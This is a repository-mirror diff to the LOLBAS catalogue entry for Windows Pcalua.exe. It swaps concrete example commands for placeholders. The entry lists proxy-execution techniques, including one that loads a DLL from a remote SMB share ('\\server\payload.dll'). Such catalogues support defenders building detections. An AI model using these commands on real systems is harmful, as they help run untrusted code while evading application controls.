mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 04:32:24 +02:00
@@ -1,10 +1,10 @@
|
||||
---
|
||||
Name: Pcalua.exe
|
||||
Description: Program Compatibility Assistant
|
||||
Author: 'Oddvar Moe'
|
||||
Author: Oddvar Moe
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: pcalua.exe -a calc.exe
|
||||
- Command: pcalua.exe -a {PATH:.exe}
|
||||
Description: Open the target .EXE using the Program Compatibility Assistant.
|
||||
Usecase: Proxy execution of binary
|
||||
Category: Execute
|
||||
@@ -13,7 +13,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: pcalua.exe -a \\server\payload.dll
|
||||
- Command: pcalua.exe -a {PATH_SMB:.dll}
|
||||
Description: Open the target .DLL file with the Program Compatibilty Assistant.
|
||||
Usecase: Proxy execution of remote dll file
|
||||
Category: Execute
|
||||
@@ -23,7 +23,7 @@ Commands:
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Execute: Remote
|
||||
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
|
||||
- Command: pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java
|
||||
Description: Open the target .CPL file with the Program Compatibility Assistant.
|
||||
Usecase: Execution of CPL files
|
||||
Category: Execute
|
||||
|
Reference in New Issue
Block a user